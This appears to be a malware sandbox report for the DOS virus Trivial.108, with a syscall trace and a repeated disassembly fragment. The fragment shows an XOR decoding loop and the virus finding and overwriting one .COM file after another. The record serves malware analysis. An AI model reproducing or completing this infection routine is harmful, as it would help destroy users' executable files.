Sample viewer

vx.netlux.org/Virus.DOS.Trivial.108

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:31:17.903495181Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x176
0x12a63: mov cx, 0x5a
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x166
0x12a78: int 0x21
0x12a7a: jb 0x12aa2
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: xchg ax, bx
0x12a85: mov ah, 0x40
2018-12-17T22:31:17.906711222Z 78 PC: 12a7a | Find first file
2018-12-17T22:31:17.91330442Z 61 PC: 12a84 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:31:17.920280629Z 64 PC: 12a90 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:31:17.927335452Z 64 PC: 12a99 | Write file or device (Write 90 bytes on handle 5)
2018-12-17T22:31:17.931263462Z 62 PC: 12a9d | Close file
2018-12-17T22:31:17.944663035Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x176
0x12a63: mov cx, 0x5a
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x166
0x12a78: int 0x21
0x12a7a: jb 0x12aa2
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: xchg ax, bx
0x12a85: mov ah, 0x40
2018-12-17T22:31:17.946856617Z 79 PC: 12a7a | Find next file
2018-12-17T22:31:17.949941806Z 61 PC: 12a84 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:31:17.956488037Z 64 PC: 12a90 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:31:17.963493747Z 64 PC: 12a99 | Write file or device (Write 90 bytes on handle 5)
2018-12-17T22:31:17.966584508Z 62 PC: 12a9d | Close file
2018-12-17T22:31:17.974837033Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x176
0x12a63: mov cx, 0x5a
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x166
0x12a78: int 0x21
0x12a7a: jb 0x12aa2
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: xchg ax, bx
0x12a85: mov ah, 0x40
2018-12-17T22:31:17.980855547Z 79 PC: 12a7a | Find next file
2018-12-17T22:31:17.996970103Z 61 PC: 12a84 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:31:18.003983332Z 64 PC: 12a90 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:31:18.011004019Z 64 PC: 12a99 | Write file or device (Write 90 bytes on handle 5)
2018-12-17T22:31:18.014626262Z 62 PC: 12a9d | Close file
2018-12-17T22:31:18.022843618Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x176
0x12a63: mov cx, 0x5a
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x166
0x12a78: int 0x21
0x12a7a: jb 0x12aa2
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: xchg ax, bx
0x12a85: mov ah, 0x40
2018-12-17T22:31:18.025795913Z 79 PC: 12a7a | Find next file
2018-12-17T22:31:18.029679482Z 61 PC: 12a84 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:31:18.037462111Z 64 PC: 12a90 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:31:18.044554756Z 64 PC: 12a99 | Write file or device (Write 90 bytes on handle 5)
2018-12-17T22:31:18.048452012Z 62 PC: 12a9d | Close file
2018-12-17T22:31:18.057046709Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x176
0x12a63: mov cx, 0x5a
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x166
0x12a78: int 0x21
0x12a7a: jb 0x12aa2
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: xchg ax, bx
0x12a85: mov ah, 0x40
2018-12-17T22:31:18.059624387Z 79 PC: 12a7a | Find next file
2018-12-17T22:31:18.06259782Z 61 PC: 12a84 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:31:18.070354595Z 64 PC: 12a90 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:31:18.076839462Z 64 PC: 12a99 | Write file or device (Write 90 bytes on handle 5)
2018-12-17T22:31:18.080165664Z 62 PC: 12a9d | Close file
2018-12-17T22:31:18.088568146Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x176
0x12a63: mov cx, 0x5a
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x166
0x12a78: int 0x21
0x12a7a: jb 0x12aa2
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: xchg ax, bx
0x12a85: mov ah, 0x40
2018-12-17T22:31:18.090871978Z 79 PC: 12a7a | Find next file
2018-12-17T22:31:18.094437615Z 61 PC: 12a84 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:31:18.101884619Z 64 PC: 12a90 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:31:18.108755891Z 64 PC: 12a99 | Write file or device (Write 90 bytes on handle 5)
2018-12-17T22:31:18.111650245Z 62 PC: 12a9d | Close file
2018-12-17T22:31:18.121044941Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x176
0x12a63: mov cx, 0x5a
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x166
0x12a78: int 0x21
0x12a7a: jb 0x12aa2
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: xchg ax, bx
0x12a85: mov ah, 0x40
2018-12-17T22:31:18.123349868Z 79 PC: 12a7a | Find next file
2018-12-17T22:31:18.126287042Z 61 PC: 12a84 | Open file (Filename = 'PAH.COM')
2018-12-17T22:31:18.133857582Z 64 PC: 12a90 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:31:18.140819739Z 64 PC: 12a99 | Write file or device (Write 90 bytes on handle 5)
2018-12-17T22:31:18.143780052Z 62 PC: 12a9d | Close file
2018-12-17T22:31:18.152287225Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x176
0x12a63: mov cx, 0x5a
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x166
0x12a78: int 0x21
0x12a7a: jb 0x12aa2
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: xchg ax, bx
0x12a85: mov ah, 0x40
2018-12-17T22:31:18.154854665Z 79 PC: 12a7a | Find next file
2018-12-17T22:31:18.15783294Z 61 PC: 12a84 | Open file (Filename = 'TEST.COM')
2018-12-17T22:31:18.166211599Z 64 PC: 12a90 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:31:18.169054389Z 64 PC: 12a99 | Write file or device (Write 90 bytes on handle 5)
2018-12-17T22:31:18.17206746Z 62 PC: 12a9d | Close file
2018-12-17T22:31:18.180882658Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x176
0x12a63: mov cx, 0x5a
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x166
0x12a78: int 0x21
0x12a7a: jb 0x12aa2
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: xchg ax, bx
0x12a85: mov ah, 0x40
2018-12-17T22:31:18.183532084Z 79 PC: 12a7a | Find next file